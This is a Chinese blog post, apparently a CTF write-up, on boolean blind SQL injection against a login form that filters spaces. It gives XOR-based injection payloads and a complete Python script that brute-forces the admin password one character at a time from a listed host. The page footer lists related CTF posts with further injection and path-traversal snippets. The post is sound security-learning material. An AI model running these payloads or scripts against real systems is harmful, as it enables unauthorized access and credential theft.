webbug php盲注,CTF-WEB 一个登录框SQL盲注

最新推荐文章于 2022-07-20 20:30:57 发布
最新推荐文章于 2022-07-20 20:30:57 发布
阅读量189 收藏
点赞数
文章标签: webbug php盲注

标签下的内容

b9c33e9a1f1ab3cec510c12c4b58ca46.png

没办法   又去学习一下“美丽的汤” Beautifulsoup 解析网页

首先放上一段测试代码:

# -*- coding:utf-8 -*-

from bs4 import BeautifulSoup

import requests

session = requests.Session()

paramsPost = {"password":"1","username":"admin"}

headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}

cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}

res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

print("Status code: %i" % res.status_code)

#print("Response body: %s" % response.content)

soup = BeautifulSoup(res.text,'html.parser')

result = soup.find_all(text = '密码错误')

print(result)

print(type(result))

Output:

2e79c60a0e8cab40d77779cd98c5795b.png

这里可以使用Burp suite 一个插件  Reissue Request Scripter   快速生成reuqests头部 加快写脚本时间

3893e5b703e5bd2cd9ea169bc27b60e4.png

之后就是构造语句的环节了,可以在本地上用SQL查看器中去检查自己的命令是否正确,因为括号真的很多,需要不断去尝试

这里也总结了一些教训,可以先用一个记事本,把payload一个一个记下来,把查询的语句和判断语句分开:

#最后拼接的主体部分

admin'^1^(ascii()={})

#substr来确认数据

substr(( ),{},1)

#查询语句

select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())

#最后每更换一次查询语句再将全部组合起来(这个查列名的语句错到我怀疑人生)

admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#

在这里要主要爆长度的判断:(这里也是一个易错点)

#一定要将select (length() = '')

select * from users where id =1^if((select(length(group_concat(table_name))

= ' ')from(information_schema.tables)where(table_schema)=(database())),1,0);

#错误语句

select * from users where id =1^if((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema)=(database()) = ' '),1,0);

#无论数字如何最后查出来一定是NULL

57c4c74c3170fe14d066e40d55577194.png

判断的位置不一样,结果也不一样,会影响最后结果

e4a8868f15f6f441f4f06d645a891fe9.png

贴出脚本:

import requests

import string

str = string.ascii_lowercase+string.ascii_uppercase+string.digits+'-{}+='

from bs4 import BeautifulSoup

session = requests.Session()

paramsPost = {"password":1,"username":" "}

headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}

cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}

def name():

flag = " "

for i in range(length()):

for str1 in str:

#paramsPost["username"] = "admin'^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),{},1))={})#".format (i+1, ord(str1))

paramsPost["username"] = "admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),{},1))={})#".format(i+1, ord(str1))

print(str1)

res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

soup = BeautifulSoup (res.text, 'html.parser')

result = soup.find_all(text='密码错误')

#print(result)

if len(result) != 0:

flag +=str1

break

print(flag)

if(flag[-1] == '}'):

break

print(flag)

def length():

len1 = 0

for i in range(50):

#paramsPost['username'] = "admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#" % i

paramsPost['username']="admin'^1^(select(length(password)=%d)from(admin)where(username)='admin')#" % i

res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)

res.encoding = 'utf-8'

soup = BeautifulSoup (res.text, 'html.parser')

result = soup.find_all(text='密码错误')

print(result)

if len(result) != 0:

len1 = i

break

print(len1)

return len1

name()

一步步报数据,爆出admin的密码是一个MD5值,3a626cd3e8d8b1375624b3fea1da02cd.png

最后发现这道题和Bugku的login3有基本一样,但是从头到尾自己做一遍,发现构造语句还是有很多地方不足,SQL盲注这里还有很多练习的。

饭配粥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
CTF-WEB 一个登录SQL盲注
热门推荐
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
CTF_webshow_web8盲注脚本
weixin_54227009的博客
05-14 319
直接大佬脚本开始嗦: import requests url = 'http://438302a7-56ba-4098-ad0a-0f245da447b0.challenge.ctf.show/index.php?id=-1/**/or/**/' name = '' # 循环45次( 循环次数按照返回的字符串长度自定义) for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d
webbug php盲注,实例讲解False盲注基础原理
weixin_34475212的博客
03-28 89
0×01 前言false盲注有些时候可以绕过一些WAF,也是容易被忽视的细节。本文的目的在于通过做CTF的同时来学习注入原理,同时也运用到自身的能力。这里只是简单说一些我自己的理解,也许网上有更好的思路和见解,都是值得学习的。0×02 false注入原理MYSQL的隐式类型转换,当字符串和数字比较时,会把字符串转为浮点数,而字符串转换时会产生一个warning,转换的结果为0,但如果字符串开头是数...
ctf wed login.php,Bugku CTF web36(Web
weixin_30404219的博客
03-27 283
0、打开网页,查看题目描述描  述:全都过滤了绝望吗? 根据描述,说明是盲注1、编写python脚本,运行获取密码import requestssession = requests.Session()url="http://114.67.246.176:15649//login.php"flag=''for i in range(1,250):left=32right=128mid=(left+...
php 登录小窗口,登录窗口简易代码
weixin_30691683的博客
04-11 159
摘要:小米商城-登录 小米商城-登录小米商城让每个人都享受科技有乐趣账号登录|扫码登录登录手机短信登录/注册立即注册|忘记密码?其它方式登录*{margin: 0px; padding: 0px;}li{list-style:none;}a{text-decoration: none;color: #ccc;cursor: pointer;}.clear{clear: both;}/*顶层白条容...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
mysql&&sql注入+ctf+web安全
最新发布
10-08
mysql&&sql注入+ctf+web安全
ctf wed login.php,ctfWEB之后台登录
weixin_39759600的博客
03-27 785
格式:flag:{xxx}解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句:$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";其实这...
web ------ SQL注入------盲注
L0g1c的博客
07-20 238
有时目标存在注入,但是页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注
php登陆页面完整代码_【代码审计】CTF中的代码审计题目应对策略(一)
weixin_34943809的博客
01-19 843
作者:kee1ongzI.前言​ 目前,CTF赛事中关于代码审计的题目,已经从一开始的简单函数trick、逻辑绕过逐渐向架分析、0day改编甚至新出0day(2020WMCTF)过渡。这类题目具有文件多,代码量大复杂的特点,难以下手。以PHP为例,Thinkphp,Laravel,typecho等架/CMS(甚至包括一些运维工具,例如WMCTF中涉及到了宝塔)都已经沦为出题点。实际上,如果...
python sql注入漏洞 ctf_CTF-WEB 一个登录SQL盲注
weixin_39921131的博客
12-09 450
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。首先找注入点:发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了)开始尝试编写脚本,结果发现简单的reuqests解析不了标签下的内容没办法 又去学习一下“美丽的汤”Beautifulso...
ctf wed login.php,HCTF2018-WEB-详细Write up
weixin_39943926的博客
03-27 611
良心比赛,这次的web题质量很高,做的很爽,跟着Delta的师傅们也学到了不少东西,发现自己还是tcl跟大佬们差得很远。Warmup参考:https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ 根据提示找到source.phpclass emmm{public static function check...
ctf+管理员登录+php,一道有意思的CTF题目
weixin_28224217的博客
03-20 2207
前言近期在整理题目的时候,发现了一道质量不错的Web题,出自2019 TMCTF Final,特此记录一下。信息搜集题目描述:Hack the following server.http://10.0.106.(team number)/User NamePasswordguestpasswordadmin(Unknown)Note: You do not have to use way of b...
4-Web安全——SQL盲注
网络安全
05-23 736
1. SQL盲注 在进行SQL注入过程中,如果当前页面没有报错回显,无法获取数据库返回结果的情况下,可以通过SQL盲注的方式对数据库中的内容进行猜解,盲注类型主要分为:布尔盲注和时间盲注。 当web页面只返回真假(true或false)两种不同类型的结果情况下,利用页面返回的不同类型结果逐个猜解数据,就可以使用布尔盲注,如果web页面不返回true或false类型的结果,则可以使用时间注入。 真实的注入环境中,web页面肯定不会直接回显true或false的,一般来说可以根据页面返回的结果作为依.
CG CTF-Web-SQL注入
feng的博客
09-06 352
SQL注入1 进入题目之后先看源码,进行代码审计 <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(S
CTF】考核比赛知识准备WEB部分(一)phpmysql
lanlanla的成长历程
10-07 1005
目录 WEB知识回顾 php概述: php功能实现: 1.表单提交: 2. include文件包含: PHP连接数据库 php漏洞demo搭建 1.phpstudy中数据库的导出和导入: 任务 编写一个登陆界面: 编写一个留言板: 编写一个图书管理系统 ①创建相关数据库 ②编写相关配置等文件 WEB知识回顾 php概述: php代码在服务器上进行执行,结...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值